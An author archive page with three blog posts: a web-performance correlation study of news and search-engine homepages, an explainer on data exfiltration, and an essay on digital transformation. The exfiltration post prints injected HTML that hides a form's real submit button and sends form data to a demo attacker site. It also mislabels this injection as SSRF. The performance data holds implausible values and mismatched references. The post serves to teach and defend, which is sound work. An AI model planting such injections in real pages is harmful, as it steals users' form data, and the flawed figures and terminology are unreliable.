Author Archives: @ndreah

Nowadays Internet speed is much better than in the past, but we can still see websites with long loading times.

Low-performing websites produce several negative side effects, for example:

  • "Research has shown that when loading time increases from one to three seconds, a user is 32% more likely to bounce. If the loading time is longer than five seconds, the probability of bouncing increases by 90%. Such experiences can prove rather frustrating, which means that large numbers of users will choose not to return to this page";
  • 46% of users don't revisit poorly performing websites;
  • low reputation of the website and negative impact on the business. E-commerce sites will practically pay the price for delays;
  • bad advertisement for the service, firm or business the website represents.

For these reasons we are going to analyse what affects the performance and usability of a website.

FIRST STUDY: HOME PAGE OF THE MOST POPULAR ITALIAN NEWS WEBSITES

We have chosen, as a small representative sample for the study, the homepages of the most well-known Italian newspapers, because they are accessed every day by lots of users, so their performance is crucial.

These homepages have been studied using GTmetrix [02]: a website performance analytics tool that provides professional reports.

Taking a significant subset of the data produced by GTmetrix we have the following table:

By calculating the Pearson’s correlation coefficient between the Fully Loaded Time and respectively the Total Page Size, the Total Image Size and the Total of HTTP Requests, we have the results shown in the following table.

The Pearson Correlation Coefficient (PCC) reveals a small correlation between Fully Loaded Time and Total Page Size, a moderate correlation between Fully Loaded Time and Total Image Size and a strong correlation between Fully Loaded Time and Total of HTTP Requests.

SECOND STUDY: HOME PAGE OF MOST POPULAR WEB SEARCH ENGINE

Website                Fully Loaded   Total Page   Total IMG   % IMG   Total of
                       Time (sec)     Size (KB)    Size (KB)   Size    Requests
www.gigablast.com           0.399         33.90        30.80   80.00          5
www.lukol.com               0.616         60.30        30.20   42.90          7
www.oscobo.com              2.000        243.00        57.30    7.10         14
search.disconnect.me        1.600        442.00       186.00   31.20         16
yandex.com                  3.500        819.00       333.00   18.80         16
www.google.com              0.613        521.00         6.82    1.30         22
infinitysearch.co           0.763        179.00        87.20   34.80         23
duckduckgo.com              0.438        350.00        12.40   20.00         25
www.startpage.com           1.000        397.00        57.70   14.30         28
search.yahoo.com          989.000    250,880.00    180224.00   58.60         29
metager.org                 1.800        257.00        84.60   66.70         30
www.wolframalpha.com       14.000        709.00        33.50    6.20         32
swisscows.com               6.100    932,864.00    742400.00   60.00         45
www.baidu.com               4.500        810.00       160.00   38.50         52
searchencrypt.com           6.000        464.00        31.60    1.90         54
www.gibiru.com              0.809    316,416.00    273408.00   42.60         54
www.qwant.com               3.800    126,976.00       289.00   19.50         87
boardreader.com             6.000    222,208.00         9.90   25.60        121
www.bing.com                3.200    277,504.00    115688.00   50.00        222
www.ask.com                12.700    326,656.00    144384.00   30.70        982

Two Variables                                  Calculated Pearson correlation   Value Range   Strength of Association
                                               coefficient [03]
Fully Loaded Time and Total Page Size          0.1377977                        0.1 .. 0.29   Small
Fully Loaded Time and Total Image Size         0.3709692                        0.3 .. 0.49   Moderate
Fully Loaded Time and Total of HTTP Requests   0.5787809                        0.5 .. 1.0    Strong
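To reproduce the coefficients in the table above, here is an added Python example (not code from the original post) that computes Pearson's r between Fully Loaded Time and each of the three predictors and maps it to the strength bands the table uses. It takes the second-study data as printed, with one labelled assumption: the 989.000 s listed for search.yahoo.com is treated as 0.989 s, because the table's coefficient of about 0.58 for HTTP requests is only reproduced with that value.

```python
from math import sqrt

# Constructed from the second-study table on this page:
# (site, fully loaded time s, total page size KB, total image size KB, requests).
# Assumption: search.yahoo.com entered as 0.989 s instead of the printed 989.000.
SEARCH_ENGINES = [
    ("www.gigablast.com", 0.399, 33.90, 30.80, 5),
    ("www.lukol.com", 0.616, 60.30, 30.20, 7),
    ("www.oscobo.com", 2.000, 243.00, 57.30, 14),
    ("search.disconnect.me", 1.600, 442.00, 186.00, 16),
    ("yandex.com", 3.500, 819.00, 333.00, 16),
    ("www.google.com", 0.613, 521.00, 6.82, 22),
    ("infinitysearch.co", 0.763, 179.00, 87.20, 23),
    ("duckduckgo.com", 0.438, 350.00, 12.40, 25),
    ("www.startpage.com", 1.000, 397.00, 57.70, 28),
    ("search.yahoo.com", 0.989, 250880.00, 180224.00, 29),
    ("metager.org", 1.800, 257.00, 84.60, 30),
    ("www.wolframalpha.com", 14.000, 709.00, 33.50, 32),
    ("swisscows.com", 6.100, 932864.00, 742400.00, 45),
    ("www.baidu.com", 4.500, 810.00, 160.00, 52),
    ("searchencrypt.com", 6.000, 464.00, 31.60, 54),
    ("www.gibiru.com", 0.809, 316416.00, 273408.00, 54),
    ("www.qwant.com", 3.800, 126976.00, 289.00, 87),
    ("boardreader.com", 6.000, 222208.00, 9.90, 121),
    ("www.bing.com", 3.200, 277504.00, 115688.00, 222),
    ("www.ask.com", 12.700, 326656.00, 144384.00, 982),
]

def pearson(xs, ys):
    """Sample Pearson correlation coefficient r = Sxy / sqrt(Sxx * Syy)."""
    n = len(xs)
    mx, my = sum(xs) / n, sum(ys) / n
    sxy = sum((x - mx) * (y - my) for x, y in zip(xs, ys))
    sxx = sum((x - mx) ** 2 for x in xs)
    syy = sum((y - my) ** 2 for y in ys)
    return sxy / sqrt(sxx * syy)

def strength(r):
    """Association bands used in the page's table, on the absolute value of r."""
    r = abs(r)
    return "Strong" if r >= 0.5 else "Moderate" if r >= 0.3 else "Small" if r >= 0.1 else "None"

def correlations(rows=SEARCH_ENGINES):
    """Return {predictor: (r, band)} for Fully Loaded Time against each predictor."""
    times = [row[1] for row in rows]
    out = {}
    for name, col in (("page_size", 2), ("image_size", 3), ("requests", 4)):
        r = pearson(times, [row[col] for row in rows])
        out[name] = (r, strength(r))
    return out
```

The HTTP-requests coefficient comes out within a few thousandths of the table's 0.5787809; the page-size and image-size coefficients computed from the printed sizes do not reproduce the table, so the printed sizes are probably not exactly the figures the author fed into the calculation.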

RESULT OF INVESTIGATION

The strong correlation (about 0.8 in the first study and about 0.6 in the second study) between the loading time and the total of HTTP requests means that the number of HTTP requests generally has a direct impact on how quickly the web page loads.

Website speed is a key factor in SEO. It affects the search engine ranking factor that determines search engine placement, which is connected to Google's algorithms.

One way to speed up a website is to reduce the number of HTTP requests. Here are some tips:

  • use a CDN (Content Delivery Network);
  • delete unnecessary images;
  • reduce image size;
  • implement the lazy loading technique;
  • minify CSS and JavaScript files.

REFERENCES

[01] Tai Wen Jun, Low Zi Xiang, Nor Azman Ismail, William Goy Ren Yi, Usability Evaluation of Social Media Website, International Research Journal of Modernization in Engineering Technology and Science, January 2021;

[02] https://gtmetrix.com, GTmetrix: How fast does your website load?;

[03] https://www.webpagetest.org/, Instantly test your site's performance in real browsers, devices, and locations around the world;

[04] https://en.wikipedia.org/wiki/Pearson_correlation_coefficient, Pearson correlation coefficient;

[05] https://en.wikipedia.org/wiki/Same-origin_policy, Same-origin policy;

[06] https://neilpatel.com/blog/does-speed-impact-rankings/, We Analyzed 143,827 URLs and Discovered the Overlooked Speed Factors That Impact Google Rankings;

Last update on 30/03/2022

"Data exfiltration is the unauthorized transfer of sensitive information from a target's network to a location which a threat actor controls" [02]. For national security and for organizations the worst scenario is when the attackers not only steal data (cyber-espionage) but also modify them, producing cyber-sabotage.

The leakage of sensitive information from a protected network to an external network could result in serious damage to the organizations in terms of reputation, loss of revenue and legal consequences, for example:

  • National Security: the theft of classified documents may endanger national security;
  • Organizations: proprietary information can be sold to a rival company, causing a loss of competitive advantage;
  • Citizens: the spreading of sensitive personal data could have serious privacy and security implications, such as identity theft through an account takeover (ATO) attack.

Sensitive proprietary digital information could be contained in:

  • static content: files, images, texts, spreadsheets, phone books, agendas etc.;
  • dynamic content: multimedia sessions, telephone conversations, video conferences, chat channels (text, video, image).

The leakage can be done in several ways:

- the data are exfiltrated without altering the original files;
- the data are modified: converted to a new file format or encrypted;
- the data are hidden using steganography techniques;
- the data are exfiltrated using a combination of the aforementioned techniques.

OUTSIDER ATTACK: CYBER-ESPIONAGE AND CYBER-SABOTAGE BY SSRF

SSRF (Server-Side Request Forgery) is an external attack which lets an attacker send crafted requests from the back-end server of a vulnerable web application. SSRF is commonly used by attackers to target internal networks that are behind firewalls and cannot be reached from the external network.

[Figure SSRF.png: SSRF - Server Side Request Forgery Schema]

It is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing. Furthermore, it could:

✔ potentially leak sensitive data such as authorization credentials;
✔ even allow an attacker to perform arbitrary command execution.

AN SSRF ATTACK: ABUSED HTML FORM ATTACK MECHANISM

An attacker can exfiltrate users' sensitive data using an "HTML form injection attack". Here is an example that uses the formaction attribute. According to the HTML5 specification, it overrides the action attribute of the parent form by specifying the URL of the resource that will process the input controls when the form is submitted.

Let us consider the following normal form in an HTML page:

<form action="URL" ... >

list of couples (label, data-box)

<button type="submit" ...> label </button>

</form>

We inject a formaction attribute:

<form action="URL" ... >

list of couples (label, data-box)

<button type="submit" formaction="BAD URL"> Fake Search! </button>

</form>

The injected button sends the form data to BAD URL instead of URL.

HTML FORM ATTACK EXAMPLE

In this type of attack we use the formaction attribute, which is fully supported by all browsers. It specifies where to send the form data when a form is submitted, overriding the form's action attribute. The following HTML code:

<h1>AUTHENTICATION System</h1> 

<div align="left">

<form action="/action.php" method="get">

<label for="iPSW">My Password:</label>
<input type="text" id="iPSW" name="nPSW"><br><br>

<button type="submit">Submit Password</button>

<button type="submit" formaction="/form_action.php">Submit Password to another page</button>

</form>
</div>

produces:

[Figure: formaction.png]

by clicking on Submit Password we have:

action.php?nPSW=BadPSW123456

by clicking on Submit Password to another page we have:

form_action.php?nPSW=BadPSW123456

The following HTML:

<article>

<form name="fsbycode" class="s4form" action="http://www.spunctum.it" method="post">

<header>
<h2>Search Guest By Numeric Code</h2>
</header>

Codice Numerico: <input type="number" autocomplete="on" id="icode" name="icode" autofocus placeholder="Insert Code Number" >

<input class="SButton" type="submit" value="Search!">

</form>

</article>

produces this form in the web browser:

[Figure: Normal Web Form]

The attack on the web server can produce the following abused HTML:

<article>
<form name="fsbycode" class="s4form" action="http://www.spunctum.it" method="post">

<header>
<h2>Search Guest By Numeric Code</h2>
</header>

Codice Numerico: <input type="number" autocomplete="on" id="icode" name="icode"
autofocus placeholder="Insert Code Number" >

<!-- BEGIN attacker's code -->
      <button type="submit" formaction="http://www.volucer.it"> Fake Search! </button>
      <style> .SButton {visibility:hidden;} </style>
<!-- END attacker's code -->

<input class="SButton" type="submit" value="Search!">

</form>
</article>

As we can see in the above code, the legitimate button used to submit the form is hidden by the injected style rule applied to the class .SButton: <style> .SButton {visibility:hidden;} </style>.

The previous HTML shows in the browser:

[Figure: Abused Web Form]

By clicking on the Fake Search! button the following HTTP request is produced:

POST http://www.volucer.it/ HTTP/1.1
Host: www.volucer.it
Proxy-Connection: keep-alive
Content-Length: 16
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: null
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip,deflate,sdch
Accept-Language: it-IT,it;q=0.8,en-US;q=0.6,en;q=0.4,he;q=0.2

icode=0123456789

This shows how the data are sent to the illegitimate web site www.volucer.it instead of www.spunctum.it (both web sites are used only to demonstrate how the attack scheme works).
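As an added defensive example (not code from the original post), the following Python script scans a page's HTML for the two indicators of the abuse shown above: a submit control whose formaction points to a different origin than its form's action, and a <style> element injected inside a form to hide the legitimate button. The sample form is constructed from the page's example; the page URL passed in is an assumption used only to resolve relative URLs.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

def same_origin(url_a, url_b, base):
    """True when both URLs, resolved against base, share scheme, host and port."""
    pa, pb = urlsplit(urljoin(base, url_a)), urlsplit(urljoin(base, url_b))
    return (pa.scheme, pa.hostname, pa.port) == (pb.scheme, pb.hostname, pb.port)

class FormActionAuditor(HTMLParser):
    """Records submit controls whose formaction redirects the form data to
    another origin, and <style> blocks placed inside a <form> (the trick used
    above to hide the real submit button)."""
    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.form_action = None   # action of the form being parsed, if any
        self.in_style = False
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_action = a.get("action") or self.page_url
        elif self.form_action is not None:
            if tag in ("button", "input") and a.get("formaction"):
                if not same_origin(a["formaction"], self.form_action, self.page_url):
                    self.findings.append(("cross-origin formaction", a["formaction"]))
            elif tag == "style":
                self.in_style = True

    def handle_data(self, data):
        if self.in_style and "hidden" in data:
            self.findings.append(("style hides control inside form", data.strip()))

    def handle_endtag(self, tag):
        if tag == "form":
            self.form_action = None
        elif tag == "style":
            self.in_style = False

def audit(html, page_url):
    """Return a list of (indicator, evidence) tuples found in html."""
    p = FormActionAuditor(page_url)
    p.feed(html)
    p.close()
    return p.findings

# Constructed sample: the abused form from this page, as served by spunctum.it
ABUSED = """<form name="fsbycode" action="http://www.spunctum.it" method="post">
<input type="number" id="icode" name="icode">
<button type="submit" formaction="http://www.volucer.it"> Fake Search! </button>
<style> .SButton {visibility:hidden;} </style>
<input class="SButton" type="submit" value="Search!">
</form>"""
```

Such a check is a detection aid only; the browser-side mitigation is a Content-Security-Policy form-action directive limiting where forms may be submitted, which also governs formaction overrides.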

INSIDER ATTACK: CYBER-ESPIONAGE AND CYBER-SABOTAGE

It is carried out by a trusted individual with legitimate access to the organization's network and system resources. Compared to external threats, insider threats are more dangerous and more difficult to detect and prevent.

If the insider uses the protected network to exfiltrate sensitive information, he could use several types of communication channel:

  • overt communication: preserving privacy by using encryption;
  • tunnelled communication: over an authorized overt channel;
  • covert communication: using steganography techniques to cloak the content.

ABOUT MITIGATION

In order to face this serious problem, the security system of an ICT infrastructure must be equipped with mechanisms for prevention, detection, damage limitation and monitoring.

PREVENTION
In order to lower the risk of attacks, unauthorized communication channels should be blocked, to prevent the exfiltration of data outside the organization through compromised applications.

DETECTION
We need a system that detects when a web site is compromised, so that we can promptly react to the attack.
Sensitive Information Dissemination Detection (SIDD) systems are a mechanism for stopping the leakage of sensitive information in time. A SIDD system monitors the outbound traffic from the protected network and takes action when suspicious packets are observed.

DAMAGE LIMITATION AND RECOVERY
When the attack is in progress we have to limit the damages by closing any compromised channels.
After attack detection this is what must be done in order to minimize information leakage:

1) analyze which vulnerability has been exploited and whether it is structural to the system or not;
2) harden the security of the information system to prevent another attack of the same type.

MONITORING
Even if the security system does not detect any problem, it is highly recommended to run random in-depth security checks, because an information leakage could have happened in a stealthy way.

REFERENCES

  1. Eric Y. Chen, Sergey Gorbaty, Astha Singhal and Collin Jackson: Self-Exfiltration: The Dangers of Browser-Enforced Information Flow Control, Carnegie Mellon University;
  2. http://blog.trendmicro.com/trendlabs-security-intelligence/data-exfiltration-in-targeted-attacks/;
  3. Yali Liu, Cherita Corbett and Ken Chiang, Rennie Archibald, Biswanath Mukherjee and Dipak Ghosal, SIDD: A Framework for Detecting Sensitive Data Exfiltration by Insider Attack, University of California, USA;
  4. https://vladtoie.gitbook.io/secure-coding/server-side/server-side-request-forgery-ssrf: Server-Side Request Forgery (SSRF);

Last update on 19/03/2022

Digital transformation (DT) is the process of integration of digital technology into all areas of a business to create new — or modify existing — business processes and customer experiences to meet changing business and market requirements. It's also a cultural change that requires organizations to continually challenge the status quo, experiment, and get comfortable with failure. It is important not to confuse Digital Transformation with investing in technology or digitalizing paper archives.

The revolution of Digital Transformation involves every aspect of modern society, in both the public and private sectors.

It is essential for governments, as they have to keep up with rapid change through more efficient delivery of services and through the creation of the so-called "digital cities". It is really urgent for industry, service companies and so on, since if they do not transform themselves they face a high risk of extinction in a highly competitive digitized economy.

While in the public sector the government should initiate and propel Digital Transformation, in the private sector this is up to the CEO, who should be ready to explain to the board the power of digital technology applied to every aspect of the organization, especially in terms of increasing revenue.

Digital Transformation is a key success factor in turning a traditional company into a competitive company in a digitized economy.

A CEO could adopt the following approach:

  1. Leverage insiders. They have intimate knowledge of what works and what doesn't in their daily activity.
  2. Analyse the customer experience from the outside. The goal of digital transformation is to improve customer satisfaction.
  3. Involve employees. They are a key factor for the success of Digital Transformation. For this reason they must not fear being replaced; on the contrary, it should be emphasized to them that Digital Transformation is an opportunity to upgrade their expertise to suit the marketplace of the future.
  4. Analyse the present business model, in particular identify what the "core business" is and what is not and can therefore be externalized.
  5. Define the concrete goals of the transformation: speed, innovation, a high level of customer care, but only in the direction of consolidating and increasing the core business.
  6. Elaborate a new business model using the new technologies (Cloud computing, Big Data, IoT, AI), with the concrete goals in mind and using the present model as a reference.
  7. Decide which digital tools to adopt.
  8. Elaborate a plan for employee training.
  9. Implement the Digital Transformation, based on the new business model that works in theory, step by step. This works better than an all-or-nothing approach, because after every step you can check and verify whether you are going in the right direction.

CYBERSECURITY IS A TOP PRIORITY

During the process of Digital Transformation a company must be protected from cyberattacks, which can stop the process or make the company fail by losing reputation, with an impact on its core business. Cybersecurity must grow in parallel with the increasing digitalization of work processes. So, to keep the ongoing Digital Transformation safe, it is necessary to boost cybersecurity by integrating AI and ML technologies into security solutions and by adding regulations for data privacy and protection.

Cyber-attacks, espionage, sabotage and data theft are the major risk to business activities, so security and trust are essential for a successful digital transformation.

The Digital Transformation increases the attack surface because:

  • every company is becoming a data company;
  • employees have ubiquitous access to applications and data for more productivity;
  • customers use digital interaction.

So investing in cybersecurity means:

  • protecting data that are important for strategic advantage;
  • increasing and defending the reputation of the company;
  • avoiding money loss and the extinction of the company.

Cybersecurity minimizes the risk of failure of the Digital Transformation, and this is a must for the survival of the transformed company.

References

[01] Thomas M. Siebel “Digital Transformation – Survive and Thrive in an Era of Mass Extinction”, RosettaBooks, New York 2019;

[02] Behnam Tabrizi, Ed Lam, Kirk Girard, and Vernon Irvin, “Digital Transformation is not about technology”, Harvard Business Review, 2021